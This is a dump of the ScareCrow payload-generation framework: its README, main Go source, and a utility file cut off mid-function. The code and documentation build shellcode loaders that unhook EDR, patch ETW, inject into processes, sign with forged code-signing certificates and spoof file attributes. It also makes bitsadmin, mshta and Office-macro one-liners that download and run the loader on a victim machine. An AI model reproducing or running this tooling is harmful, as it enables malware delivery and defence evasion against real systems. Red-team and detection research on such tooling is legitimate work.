JScriptLoader_Buff(name, filename, mode, sandbox) 976 | f, _ := os.Open(filename) 977 | reader := bufio.NewReader(f) 978 | content, _ := ioutil.ReadAll(reader) 979 | encoded := base64.StdEncoding.EncodeToString(content) 980 | finalcode := JScript_Buff(fso, dropPath, encoded, code, name, mode, sandbox) 981 | URL = Utils.Command(URL, CommandLoader, outFile) 982 | if CommandLoader == "hta" { 983 | hexcode := hex.EncodeToString(content) 984 | finalcode = HTA_Buff(hexcode, filename) 985 | 986 | } 987 | if CommandLoader == "macro" { 988 | Macro_Buff(URL, outFile) 989 | } 990 | Utils.Writefile(outFile, finalcode) 991 | os.Chdir("..") 992 | os.Rename(name+"/"+outFile, outFile) 993 | os.RemoveAll(name) 994 | fmt.Println("[+] Loader Compiled") 995 | } 996 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/README.md: -------------------------------------------------------------------------------- 1 | 2 |
26 | After
27 |
28 |
29 |
30 | During the creation process of the loader, ScareCrow utilizes a library for blending into the background after a beacon calls home. This library does two things:
31 | * Code signs the Loader:
32 | Files that are signed with code signing certificates are often put under less scrutiny, making it easier to be executed without being challenged, as files signed by a trusted name are often less suspicious than others. Most antimalware products don’t have the time to validate and verify these certificates (now some do but typically the common vendor names are included in a whitelist). ScareCrow creates these certificates by using a go package version of the tool `limelighter` to create a pfx12 file. This package takes an inputted domain name, specified by the user, to create a code signing certificate for that domain. If needed, you can also use your own code signing certificate if you have one, using the valid command-line option.
33 | * Spoof the attributes of the loader:
34 | This is done by using syso files which are a form of embedded resource files that when compiled along with our loader, will modify the attribute portions of our compiled code. Prior to generating a syso file, ScareCrow will generate a random file name (based on the loader type) to use. Once chosen, this file name will map to the associated attributes for that file name, ensuring that the right values are assigned.
35 |
36 | ### File Attribute Sample
37 |
38 |
39 |
40 | With these files and the go code, ScareCrow will cross compile them into DLLs using the c-shared library option. Once the DLL is compiled, it is obfuscated into a broken base64 string that will be embedded into a file. This allows for the file to be remotely pulled, accessed, and programmatically executed.
41 |
42 |
43 | ## Install
44 | The first step as always is to clone the repo. Before you compile ScareCrow, you'll need to install the dependencies.
45 |
46 | To install them, run following commands:
47 |
48 | ```
49 | go get github.com/fatih/color
50 | go get github.com/yeka/zip
51 | go get github.com/josephspurrier/goversioninfo
52 | ```
53 | Make sure that the following are installed on your OS:
54 | ```
55 | openssl
56 | osslsigncode
57 | mingw-w64
58 | ```
59 |
60 | Then build it
61 |
62 | ```
63 | go build ScareCrow.go
64 | ```
65 |
66 | ## Help
67 |
68 | ```
69 |
70 | ./ScareCrow -h
71 |
72 | _________ _________
73 | / _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
74 | \_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
75 | / \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
76 | /_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
77 | \/ \/ \/ \/ \/
78 | (@Tyl0us)
79 | “Fear, you must understand is more than a mere obstacle.
80 | Fear is a TEACHER. the first one you ever had.”
81 |
82 | Usage of ./ScareCrow:
83 | -I string
84 | Path to the raw 64-bit shellcode.
85 | -Loader string
86 | Sets the type of process that will sideload the malicious payload:
87 | [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)
88 | [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified. A JScript loader will be generated.
89 | [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
90 | [*] excel - Loads into a hidden Excel process using a JScript loader.
91 | [*] msiexec - Loads into MSIexec process using a JScript loader.
92 | [*] wscript - Loads into WScript process using a JScript loader.
93 | (default "binary")
94 | -O string
95 | Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
96 | -configfile string
97 | The path to a json based configuration file to generate custom file attributes. This will not use the default ones.
98 | -console
99 | Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
100 | -delivery string
101 | Generates a one-liner command to download and execute the payload remotely:
102 | [*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders).
103 | [*] hta - Generates a blank hta file containing the loader along with a MSHTA command to execute the loader remotely in the background (Compatible with Control and Excel Loaders).
104 | [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders)
105 | -domain string
106 | The domain name to use for creating a fake code signing cert. (e.g. www.acme.com)
107 | -etw
108 | Enables ETW patching to prevent ETW events from being generated
109 | -injection string
110 | Enables Process Injection Mode and specifies the path to the process to create/inject into (use \ for the path).
111 | -password string
112 | The password for the code signing cert. Required when -valid is used.
113 | -sandbox
114 | Enables sandbox evasion using IsDomainedJoined calls.
115 | -unmodified
116 | When enabled will generate a DLL loader that WILL NOT remove the EDR hooks in system DLLs and only use custom syscalls (set to false by default)
117 | -url string
118 | URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)
119 | -valid string
120 | The path to a valid code signing cert. Used instead of -domain if a valid code signing cert is desired.
121 | ```
122 | ## Loader
123 | The Loader determines the type of technique to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file, that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes three different types of loaders to load shellcode into memory:
124 | * Control Panel – This generates a control panel applet (i.e. Program and Features, or AutoPlay). By compiling the loader to have specific DLL export functions in combination with a file extension .cpl, it will spawn a control panel process (rundll32.exe) and the loader will be loaded into memory.
125 | * WScript – Spawns a WScript process that utilizes a manifest file and registration-free Com techniques to load (not injected) DLL loader into its own process, side-by-side. This avoids registering the DLL in memory as the manifest file tells the process which, where, and what version of a DLL to load.
126 | * Excel – Generates an XLL file which are Excel-based DLL files that when loaded into Excel will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded.
127 | * Msiexec - Spawns a hidden MSIExec process that will load the DLL into memory and execute the shellcode.
128 |
129 |
130 | ScareCrow can also generate binary based payloads if needed by using the `-loader` command line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation.
131 |
132 |
133 | ## Console
134 | ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things, first it helps keep the process hidden and second, avoids being detected by any EDR product. Spawning a process right away in the background can be very suspiciousness and an indicator of maliciousness. ScareCrow does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows function after the process is created and the EDR’s hooks are loaded, and then changes the windows attributes to hidden. ScareCrow utilizes these APIs rather than using the traditional ` -ldflags -H=windowsgui` as this is highly signatured and classified in most security products as an Indicator of Compromise.
135 |
136 | If the `-console` command-line option is selected, ScareCrow will not hide the process in the background. Instead, ScareCrow will add several debug messages displaying what the loader is doing.
137 |
138 | ## Process Injection
139 | ScareCrow contains the ability to do process injection attacks. To avoid any hooking or detection in either the loader process or the injected process itself, ScareCrow first unhooks the loader process as it would normally, to ensure there are no hooks in the process. Once completed, the loader will then spawn the process specified in the creation command. Once spawned, the loader will then create a handle to the process to retrieve a list of loaded DLLs. Once it finds DLLs, it will enumerate the base address of each DLL in the remote process. Using the function WriteProcessMemory the loader will then write the bytes of the system DLLs stored on disk (since they are “clean” of EDR hooks) without the need to change the memory permissions first. ScareCrow uses WriteProcessMemory because this function contains a feature primarily used in debugging where even if a section of memory is read-only, if everything is correct in the call to WriteProcessMemory, it will temporarily change the permission to read-write, update the memory section and then restore the original permissions. Once this is done, the loader can inject shellcode into the spawned process with no issue, as there are no EDR hooks in either process.
140 |
141 | This option can be used with any of the loader options. To enable process injection, use the `-injection` command-line option along with the full path to the process you want to use to inject into. When putting the path in as an argument, it is important to either surround the full path with `""` or use double `\` for each directory in the path.
142 |
143 |
144 | ## ETW Bypass
145 | ScareCrow contains the ability to patch ETW functions, preventing any event from being generated by the process. ETW utilizes built-in Syscalls to generate this telemetry. Since ETW is a native feature built into Windows, security products do not need to "hook" the ETW syscalls to gain the information. As a result, to prevent ETW, ScareCrow patches numerous ETW syscalls, flushing out the registers and returning the execution flow to the next instruction. Use the `-etw` command-line option to enable this in your loader.
146 |
147 |
148 | ## Delivery
149 | The deliver command line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victim’s host. These delivery methods include:
150 | * Bits – This will generate a bitsadmin command that while download the loader remotely, execute it and remove it. This delivery command is compatible with Binary, Control, Excel and Wscript loaders.
151 | * HTA – This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely. This delivery command is compatible with Control and Excel loaders.
152 | * Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed. This delivery command is compatible with Control, Excel and Wscript loaders.
153 |
154 | ## Custom Attribute Files
155 | While ScareCrow has an extensive list of file attributes, there are some circumstances where a custom (maybe environment-specific) set of attributes is required. To accommodate this, ScareCrow allows for the inputting of a JSON file containing attributes. Using the `-configfile` command-line option, ScareCrow will use these attributes and filename instead of the pre-existing ones in ScareCrow. The file `main.json` contains a sample template of what the JSON structure needs to be to properly work. Note whatever you use as the "InternalName" will be the file name.
156 |
157 |
158 | ## To Do
159 | * Currently only supports x64 payloads
160 | * Some older versions of Window's OSes (i.e. Windows 7 or Windows 8.1), have issues reloading the systems DLLs, as a result a version check is built in to ensure stability
161 |
162 | ## Credit
163 | * Special thanks to josephspurrier for his [repo](https://github.com/josephspurrier/goversioninfo)
164 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/ScareCrow:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/ScareCrow
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/ScareCrow.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "ScareCrow/Cryptor"
5 | "ScareCrow/Loader"
6 | "ScareCrow/limelighter"
7 | "bytes"
8 | "crypto/aes"
9 | "crypto/cipher"
10 | "encoding/base64"
11 | "encoding/hex"
12 | "flag"
13 | "fmt"
14 | "io/ioutil"
15 | "log"
16 | "os/exec"
17 | )
18 |
19 | type FlagOptions struct {
20 | outFile string
21 | inputFile string
22 | URL string
23 | LoaderType string
24 | CommandLoader string
25 | domain string
26 | password string
27 | valid string
28 | configfile string
29 | ProcessInjection string
30 | ETW bool
31 | console bool
32 | refresher bool
33 | sandbox bool
34 | }
35 |
36 | func options() *FlagOptions {
37 | outFile := flag.String("O", "", "Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.")
38 | inputFile := flag.String("I", "", "Path to the raw 64-bit shellcode.")
39 | console := flag.Bool("console", false, "Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.")
40 | LoaderType := flag.String("Loader", "binary", `Sets the type of process that will sideload the malicious payload:
41 | [*] binary - Generates a binary based payload. (This type does not benfit from any sideloading)
42 | [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
43 | [*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
44 | [*] excel - Loads into a hidden Excel process using a JScript loader.
45 | [*] msiexec - Loads into MSIexec process using a JScript loader.
46 | [*] wscript - Loads into WScript process using a JScript loader.
47 | `)
48 | refresher := flag.Bool("unmodified", false, "When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default)")
49 | URL := flag.String("url", "", "URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)")
50 | CommandLoader := flag.String("delivery", "", `Generates a one-liner command to download and execute the payload remotely:
51 | [*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders).
52 | [*] hta - Generates a blank hta file containing the loader along with a MSHTA command execute the loader remotely in the background (Compatible with Control and Excel Loaders).
53 | [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders)`)
54 | domain := flag.String("domain", "", "The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) ")
55 | password := flag.String("password", "", "The password for code signing cert. Required when -valid is used.")
56 | ETW := flag.Bool("etw", false, "Enables ETW patching to prevent ETW events from being generated")
57 | ProcessInjection := flag.String("injection", "", "Enables Process Injection Mode and specify the path to the process to create/inject into (use \\ for the path).")
58 | configfile := flag.String("configfile", "", "The path to a json based configuration file to generate custom file attributes. This will not use the the default ones.")
59 | valid := flag.String("valid", "", "The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.")
60 | sandbox := flag.Bool("sandbox", false, `Enables sandbox evasion using IsDomainedJoined calls.`)
61 | flag.Parse()
62 | return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, password: *password, configfile: *configfile, console: *console, ETW: *ETW, ProcessInjection: *ProcessInjection, refresher: *refresher, valid: *valid, sandbox: *sandbox}
63 | }
64 |
65 | func execute(opt *FlagOptions, name string) string {
66 | bin, _ := exec.LookPath("env")
67 | var compiledname string
68 | var cmd *exec.Cmd
69 | if opt.configfile != "" {
70 | oldname := name
71 | name = limelighter.FileProperties(name, opt.configfile)
72 | cmd = exec.Command("mv", "../"+oldname+"", "../"+name+"")
73 | err := cmd.Run()
74 | if err != nil {
75 | fmt.Printf("error")
76 | }
77 | } else {
78 | name = limelighter.FileProperties(name, opt.configfile)
79 | }
80 | if opt.LoaderType == "binary" {
81 | cmd = exec.Command(bin, "GOROOT_FINAL=/dev/null", "GOOS=windows", "GOARCH=amd64", "go", "build", "-a", "-trimpath", "-ldflags", "-s -w", "-o", ""+name+".exe")
82 | } else {
83 | cmd = exec.Command(bin, "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "go", "build", "-a", "-trimpath", "-ldflags", "-w -s", "-o", ""+name+".dll", "-buildmode=c-shared")
84 | }
85 | fmt.Println("[*] Compiling Payload")
86 | var out bytes.Buffer
87 | var stderr bytes.Buffer
88 | cmd.Stdout = &out
89 | cmd.Stderr = &stderr
90 | err := cmd.Run()
91 | if err != nil {
92 | fmt.Printf("%s: %s\n", err, stderr.String())
93 | }
94 | if opt.LoaderType == "binary" {
95 | compiledname = name + ".exe"
96 | } else {
97 | compiledname = name + ".dll"
98 | }
99 | fmt.Println("[+] Payload Compiled")
100 | limelighter.Signer(opt.domain, opt.password, opt.valid, compiledname)
101 | return name
102 | }
103 |
104 | func main() {
105 | fmt.Println(`
106 | _________ _________
107 | / _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
108 | \_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
109 | / \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
110 | /_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
111 | \/ \/ \/ \/ \/
112 | (@Tyl0us)
113 | “Fear, you must understand is more than a mere obstacle.
114 | Fear is a TEACHER. the first one you ever had.”
115 | `)
116 | opt := options()
117 |
118 | if opt.inputFile == "" {
119 | log.Fatal("Error: Please provide a path to a file containing raw 64-bit shellcode (i.e .bin files)")
120 | }
121 |
122 | if opt.CommandLoader != "" && opt.URL == "" {
123 | log.Fatal("Error: Please provide the url the loader will be hosted on in order to generate a delivery command")
124 | }
125 |
126 | if opt.LoaderType != "dll" && opt.LoaderType != "binary" && opt.LoaderType != "control" && opt.LoaderType != "excel" && opt.LoaderType != "msiexec" && opt.LoaderType != "wscript" {
127 | log.Fatal("Error: Invalid loader, please select one of the allowed loader types")
128 | }
129 |
130 | if opt.CommandLoader != "" && opt.CommandLoader != "bits" && opt.CommandLoader != "hta" && opt.CommandLoader != "macro" {
131 | log.Fatal("Error: Invalid delivery option, please select one of the allowed delivery types")
132 | }
133 |
134 | if opt.CommandLoader == "hta" && opt.outFile == "" {
135 | log.Fatal("Error: Please provide the a HTA filename to store the loader in")
136 | }
137 |
138 | if (opt.CommandLoader == "hta" || opt.CommandLoader == "macro") && (opt.LoaderType == "binary" || opt.LoaderType == "dll") {
139 | log.Fatal("Error: Binary and DLL loaders are not compatable with this delivery command")
140 | }
141 |
142 | if opt.outFile != "" && (opt.LoaderType == "binary" || opt.LoaderType == "dll") {
143 | fmt.Println("[!] -O not needed. This loader type uses the name of the file they are spoofing")
144 | }
145 |
146 | if opt.LoaderType == "binary" && opt.refresher == true {
147 | log.Fatal("Error: Can not use the unmodified option with a binary loader")
148 | }
149 |
150 | if opt.console == true && opt.LoaderType != "binary" {
151 | log.Fatal("Error: Console mode is only for binary based payloads")
152 | }
153 |
154 | if opt.domain == "" {
155 | log.Fatal("Error: Please provide a domain in order to generate a code signing certificate")
156 | }
157 |
158 | if opt.password == "" && opt.valid != "" {
159 | log.Fatal("Error: Please provide a password for the valid code signing certificate")
160 | }
161 |
162 | if opt.ProcessInjection != "" && opt.ETW == true {
163 | log.Fatal("Error: Currently process injection and ETW bypass is not available together yet. Please try only one of these options")
164 | }
165 |
166 | var rawbyte []byte
167 | src, _ := ioutil.ReadFile(opt.inputFile)
168 | dst := make([]byte, hex.EncodedLen(len(src)))
169 | hex.Encode(dst, src)
170 | r := base64.StdEncoding.EncodeToString(dst)
171 | rawbyte = []byte(r)
172 | key := Cryptor.RandomBuffer(32)
173 | iv := Cryptor.RandomBuffer(16)
174 |
175 | block, err := aes.NewCipher(key)
176 | if err != nil {
177 | log.Fatal(err)
178 | }
179 | paddedInput, err := Cryptor.Pkcs7Pad([]byte(rawbyte), aes.BlockSize)
180 | if err != nil {
181 | log.Fatal(err)
182 | }
183 | fmt.Println("[*] Encrypting Shellcode Using AES Encryption")
184 | cipherText := make([]byte, len(paddedInput))
185 | ciphermode := cipher.NewCBCEncrypter(block, iv)
186 | ciphermode.CryptBlocks(cipherText, paddedInput)
187 | b64ciphertext := base64.StdEncoding.EncodeToString(cipherText)
188 | b64key := base64.StdEncoding.EncodeToString(key)
189 | b64iv := base64.StdEncoding.EncodeToString(iv)
190 | fmt.Println("[+] Shellcode Encrypted")
191 | name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.refresher, opt.console, opt.sandbox, opt.ETW, opt.ProcessInjection)
192 | name = execute(opt, name)
193 | Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox)
194 |
195 | }
196 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/File_Attributes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/File_Attributes.png
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/PreRefreshed_Dlls.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/PreRefreshed_Dlls.png
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/Refreshed_Dlls.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/Refreshed_Dlls.png
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/ScareCrow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/ScareCrow.png
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Utils/Utils.go:
--------------------------------------------------------------------------------
1 | package Utils
2 |
3 | import (
4 | "ScareCrow/Cryptor"
5 | "archive/zip"
6 | "encoding/base64"
7 | "fmt"
8 | "io"
9 | "os"
10 | "path/filepath"
11 | "strings"
12 |
13 | "github.com/fatih/color"
14 | )
15 |
16 | const base64string = "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"
17 |
18 | func Writefile(outFile string, result string) {
19 | cf, err := os.OpenFile(outFile, os.O_CREATE|os.O_WRONLY, 0644)
20 | check(err)
21 | defer cf.Close()
22 | _, err = cf.Write([]byte(result))
23 | check(err)
24 | }
25 |
26 | func check(e error) {
27 | if e != nil {
28 | panic(e)
29 | }
30 | }
31 |
32 | func B64ripper(B64string string, B64Varible string, implant bool) string {
33 | var B64payload []string
34 | MAX_LENGTH := Cryptor.GenerateNumer(400, 850)
35 | x := 0
36 | B64length := len(B64string)
37 | if implant == true {
38 | B64payload = append(B64payload, fmt.Sprintf("var "+B64Varible+" string\n"))
39 | for x < B64length {
40 | if x+MAX_LENGTH <= B64length {
41 | B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\"\n", B64string[0+x:x+MAX_LENGTH]))
42 |
43 | x += MAX_LENGTH
44 | } else {
45 | finalLength := B64length - x
46 | B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\"\n", B64string[0+x:x+finalLength]))
47 | x += finalLength
48 | }
49 | }
50 | } else {
51 | B64payload = append(B64payload, fmt.Sprintf("var "+B64Varible+"=\"\";\n"))
52 | for x < B64length {
53 | if x+MAX_LENGTH <= B64length {
54 | B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\";\n", B64string[0+x:x+MAX_LENGTH]))
55 |
56 | x += MAX_LENGTH
57 | } else {
58 | finalLength := B64length - x
59 | B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\";\n", B64string[0+x:x+finalLength]))
60 | x += finalLength
61 | }
62 | }
63 |
64 | }
65 | finalstring := strings.Join(B64payload, "")
66 | return finalstring
67 | }
68 |
69 | func Unzip(src string, dest string) ([]string, error) {
70 | var filenames []string
71 | r, err := zip.OpenReader(src)
72 | if err != nil {
73 | return filenames, err
74 | }
75 | defer r.Close()
76 | for _, f := range r.File {
77 | fpath := filepath.Join(dest, f.Name)
78 | if !strings.HasPrefix(fpath, filepath.Clean(dest)+string(os.PathSeparator)) {
79 | return filenames, fmt.Errorf("%s: illegal file path", fpath)
80 | }
81 | filenames = append(filenames, fpath)
82 | if f.FileInfo().IsDir() {
83 | os.MkdirAll(fpath, os.ModePerm)
84 | continue
85 | }
86 | if err = os.MkdirAll(filepath.Dir(fpath), os.ModePerm); err != nil {
87 | return filenames, err
88 | }
89 | outFile, err := os.OpenFile(fpath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())
90 | if err != nil {
91 | return filenames, err
92 | }
93 | rc, err := f.Open()
94 | if err != nil {
95 | return filenames, err
96 | }
97 | _, err = io.Copy(outFile, rc)
98 | outFile.Close()
99 | rc.Close()
100 |
101 | if err != nil {
102 | return filenames, err
103 | }
104 | }
105 | return filenames, nil
106 | }
107 |
108 | func B64decode(name string) {
109 | dec, err := base64.StdEncoding.DecodeString(base64string)
110 | if err != nil {
111 | panic(err)
112 | }
113 | f, err := os.Create(name)
114 | if err != nil {
115 | panic(err)
116 | }
117 | defer f.Close()
118 | if _, err := f.Write(dec); err != nil {
119 | panic(err)
120 | }
121 | if err := f.Sync(); err != nil {
122 | panic(err)
123 | }
124 | }
125 |
126 | func Zipit(source, target string) error {
127 | zipfile, err := os.Create(target)
128 | if err != nil {
129 | return err
130 | }
131 | defer zipfile.Close()
132 | archive := zip.NewWriter(zipfile)
133 | defer archive.Close()
134 | info, err := os.Stat(source)
135 | if err != nil {
136 | return nil
137 | }
138 | var baseDir string
139 | if info.IsDir() {
140 | baseDir = filepath.Base(source)
141 | }
142 | filepath.Walk(source, func(path string, info os.FileInfo, err error) error {
143 | if err != nil {
144 | return err
145 | }
146 | header, err := zip.FileInfoHeader(info)
147 | if err != nil {
148 | return err
149 | }
150 | if baseDir != "" {
151 | header.Name = filepath.Join(baseDir, strings.TrimPrefix(path, source))
152 | }
153 | if info.IsDir() {
154 | header.Name += "/"
155 | } else {
156 | header.Method = zip.Deflate
157 | }
158 | writer, err := archive.CreateHeader(header)
159 | if err != nil {
160 | return err
161 | }
162 | if info.IsDir() {
163 | return nil
164 | }
165 | file, err := os.Open(path)
166 | if err != nil {
167 | return err
168 | }
169 | defer file.Close()
170 | _, err = io.Copy(writer, file)
171 | return err
172 |
173 | })
174 | return err
175 | }
176 |
177 | func Command(URL string, CommandLoader string, outFile string) string {
178 |
179 | if URL != "" && CommandLoader == "hta" {
180 | fmt.Println("[*] HTA Payload")
181 | fmt.Println("[!] Can be executed manually by a user or embeded into a one liner command that executes it:")
182 | if strings.HasSuffix(URL, "/") {
183 | fmt.Println("mshta.exe " + URL + outFile)
184 | } else {
